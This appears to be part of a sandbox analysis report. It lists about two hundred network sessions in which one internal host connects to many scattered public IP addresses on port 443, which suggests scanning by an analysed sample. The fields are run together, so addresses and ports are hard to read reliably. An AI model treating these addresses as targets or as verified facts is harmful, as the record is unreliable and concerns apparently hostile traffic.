                                                  16229192.168.2.1340014108.161.243.186443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16230192.168.2.1336386212.10.127.250443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16231192.168.2.1340120177.39.61.95443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16232192.168.2.1346464220.32.161.128443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16233192.168.2.1342872157.70.44.197443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16234192.168.2.135637657.230.230.17443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16235192.168.2.1336902133.51.62.240443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16236192.168.2.1333362159.229.72.41443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16237192.168.2.1342912181.115.199.129443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16238192.168.2.1336858166.108.57.244443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16239192.168.2.133709850.71.9.209443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16240192.168.2.1351638206.198.57.170443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16241192.168.2.1340936205.108.172.108443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16242192.168.2.1348342119.121.133.246443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16243192.168.2.1339734178.14.190.14443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16244192.168.2.134770279.132.146.70443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16245192.168.2.1335650125.30.187.147443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16246192.168.2.1349794168.218.28.233443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16247192.168.2.134597465.64.135.34443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16248192.168.2.133490049.8.111.88443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16249192.168.2.1356898124.133.81.194443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16250192.168.2.1336078175.162.223.89443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16251192.168.2.135095023.249.226.157443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16252192.168.2.134153891.172.46.183443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16253192.168.2.134937867.46.179.142443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16254192.168.2.133718444.125.93.151443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16255192.168.2.1350178187.14.238.211443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16256192.168.2.1348256136.180.253.7443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16257192.168.2.134582035.167.215.96443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16258192.168.2.133886624.249.170.214443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16259192.168.2.1346982200.113.222.192443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16260192.168.2.1346122134.10.251.183443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16261192.168.2.1346860163.93.56.145443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16262192.168.2.1334132182.188.153.185443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16263192.168.2.133465272.186.97.210443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16264192.168.2.135628239.190.152.25443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16265192.168.2.1340736184.137.248.73443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16266192.168.2.135301635.78.31.46443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16267192.168.2.135323054.212.245.164443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16268192.168.2.134052267.75.244.238443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16269192.168.2.135036697.206.128.108443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16270192.168.2.133919036.46.147.212443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16271192.168.2.133324223.233.197.53443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16272192.168.2.134405623.18.24.46443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16273192.168.2.134429292.38.200.76443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16274192.168.2.1359012212.95.90.7443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16275192.168.2.135708654.4.63.227443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16276192.168.2.1357650222.231.85.64443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16277192.168.2.1347704179.101.47.253443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16278192.168.2.1344472185.67.98.125443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16279192.168.2.1338802162.117.124.40443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16280192.168.2.134758282.186.197.179443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16281192.168.2.1358166176.240.198.58443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16282192.168.2.1351504148.87.64.228443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16283192.168.2.1344070164.223.125.36443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16284192.168.2.136073820.238.20.210443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16285192.168.2.1346084124.133.61.159443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16286192.168.2.1359662192.135.94.37443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16287192.168.2.1351548203.25.56.238443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16288192.168.2.1356238134.85.230.135443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16289192.168.2.1348974102.121.27.144443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16290192.168.2.13514461.60.152.206443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16291192.168.2.1348708121.103.3.200443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16292192.168.2.134263027.17.234.132443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16293192.168.2.1355638157.64.142.49443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16294192.168.2.1339618163.93.132.166443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16295192.168.2.1358134188.30.170.204443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16296192.168.2.1340786146.118.255.66443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16297192.168.2.1357790103.121.1.222443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16298192.168.2.133725887.151.149.225443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16299192.168.2.133950440.142.149.114443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16300192.168.2.1353050108.60.44.138443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16301192.168.2.133592299.38.112.41443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16302192.168.2.1353970193.226.214.17443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16303192.168.2.135771034.202.237.25443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16304192.168.2.134070899.22.155.45443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16305192.168.2.1347158199.194.73.151443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16306192.168.2.1334844144.22.247.197443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16307192.168.2.1358274151.52.89.69443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16308192.168.2.1333204147.119.218.141443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16309192.168.2.1359484170.251.48.14443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16310192.168.2.1348770185.0.165.160443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16311192.168.2.134872447.248.3.119443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16312192.168.2.134018291.214.123.237443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16313192.168.2.1332884184.194.225.109443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16314192.168.2.1340648200.11.85.131443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16315192.168.2.1341078100.199.31.156443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16316192.168.2.134743650.232.133.97443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16317192.168.2.1341106156.115.195.188443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16318192.168.2.1355208161.112.122.108443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16319192.168.2.133808063.137.163.186443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16320192.168.2.1344860140.158.7.247443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16321192.168.2.1342760178.241.195.12443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16322192.168.2.136022893.235.105.130443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16323192.168.2.1355086152.182.170.119443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16324192.168.2.135436483.162.44.124443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16325192.168.2.1337648132.164.46.4443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16326192.168.2.1350548133.121.211.30443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16327192.168.2.1346962202.38.88.232443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16328192.168.2.134528454.196.35.228443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16329192.168.2.1359658161.237.119.55443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16330192.168.2.1355530115.198.53.57443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16331192.168.2.134100637.26.122.102443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16332192.168.2.1357164192.216.253.203443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16333192.168.2.1358780184.21.6.249443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16334192.168.2.133495625.78.210.95443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16335192.168.2.1358048173.55.70.157443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16336192.168.2.135259689.24.14.108443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16337192.168.2.135465413.120.146.46443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16338192.168.2.1349246162.114.60.9443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16339192.168.2.1355892196.103.119.0443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16340192.168.2.134216627.24.126.50443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16341192.168.2.133530087.181.87.202443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16342192.168.2.134440217.58.216.18443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16343192.168.2.134998486.151.73.62443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16344192.168.2.134913647.220.64.29443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16345192.168.2.1351984144.86.144.102443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16346192.168.2.1357932180.205.129.224443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16347192.168.2.135858865.101.156.229443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16348192.168.2.1343890153.29.86.180443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16349192.168.2.1351268105.60.159.38443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16350192.168.2.133330690.164.223.237443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16351192.168.2.134061479.247.81.84443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16352192.168.2.135297852.55.57.210443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16353192.168.2.135515231.227.198.110443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16354192.168.2.1359624112.106.90.46443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16355192.168.2.1334830113.18.248.64443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16356192.168.2.1354862206.63.81.149443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16357192.168.2.1343944203.145.66.186443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16358192.168.2.1339612126.200.201.98443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16359192.168.2.135995218.33.15.35443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16360192.168.2.1339588102.154.59.131443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16361192.168.2.1353080199.2.56.161443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16362192.168.2.135922480.10.195.185443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16363192.168.2.1337612102.240.121.92443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16364192.168.2.1338072202.122.246.124443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16365192.168.2.1360438177.16.94.9443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16366192.168.2.1337064213.239.218.187443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16367192.168.2.135180447.22.181.97443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16368192.168.2.1347950100.45.121.10443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16369192.168.2.1337668213.240.23.68443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16370192.168.2.133818861.34.62.205443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16371192.168.2.135752687.144.142.111443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16372192.168.2.1357328222.180.243.134443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16373192.168.2.135360491.65.78.43443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16374192.168.2.1338016159.208.69.137443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16375192.168.2.135434093.113.246.65443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16376192.168.2.1345168147.235.22.201443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16377192.168.2.136068264.46.76.151443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16378192.168.2.1347046162.252.193.246443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16379192.168.2.134874284.221.253.18443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16380192.168.2.133492069.240.24.127443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16381192.168.2.133899064.224.156.102443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16382192.168.2.1348820188.111.25.112443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16383192.168.2.1335446200.21.27.5443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16384192.168.2.1343280156.248.104.37443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16385192.168.2.1358782160.45.94.138443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16386192.168.2.1350982101.24.81.58443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16387192.168.2.1360428191.152.150.246443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16388192.168.2.1349630106.169.167.229443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16389192.168.2.1352262118.94.203.69443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16390192.168.2.1342480209.103.222.215443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16391192.168.2.134496652.133.213.82443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16392192.168.2.135670483.172.136.1443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16393192.168.2.1349248196.108.176.169443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16394192.168.2.135899627.211.140.60443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16395192.168.2.1343414128.238.157.30443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16396192.168.2.1336188210.78.208.98443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16397192.168.2.1349456180.119.83.102443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16398192.168.2.133482070.107.49.152443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16399192.168.2.1355566152.172.5.214443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16400192.168.2.133504059.103.71.245443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16401192.168.2.1351524101.151.71.186443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16402192.168.2.1334354183.122.53.226443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16403192.168.2.135902287.101.7.13443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16404192.168.2.135688681.211.216.201443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16405192.168.2.1333258101.142.239.84443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16406192.168.2.1345036161.146.88.93443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16407192.168.2.134419887.140.185.243443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16408192.168.2.135890090.184.33.130443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16409192.168.2.1344932161.251.99.234443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16410192.168.2.1355070144.98.125.101443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16411192.168.2.1357044205.46.30.178443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16412192.168.2.134968895.42.43.67443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16413192.168.2.134276253.65.106.218443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16414192.168.2.1335988159.242.126.71443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16415192.168.2.1355776216.1.97.245443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16416192.168.2.1352140136.38.48.120443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16417192.168.2.135364425.118.72.200443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16418192.168.2.1350356162.225.161.27443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16419192.168.2.1358882166.24.229.245443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16420192.168.2.13597405.113.84.53443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16421192.168.2.1336088165.73.178.148443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16422192.168.2.1357950163.21.31.69443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16423192.168.2.13493161.125.229.173443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16424192.168.2.134033667.53.81.129443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16425192.168.2.1347336133.34.164.242443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16426192.168.2.1354616153.228.96.82443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16427192.168.2.1336764161.204.106.35443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16428192.168.2.134508080.91.234.14443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16429192.168.2.133647412.76.225.105443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16430192.168.2.1344886165.242.144.88443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16431192.168.2.1358562211.244.31.155443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16432192.168.2.134368064.65.20.235443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16433192.168.2.133650845.230.138.187443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16434192.168.2.1360270108.244.90.66443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16435192.168.2.1348362152.119.176.71443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16436192.168.2.1340162216.97.65.145443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16437192.168.2.134072685.109.31.93443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16438192.168.2.1334918219.71.141.244443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16439192.168.2.13538505.175.10.177443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16440192.168.2.1358956217.92.137.216443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16441192.168.2.1358608118.204.62.114443
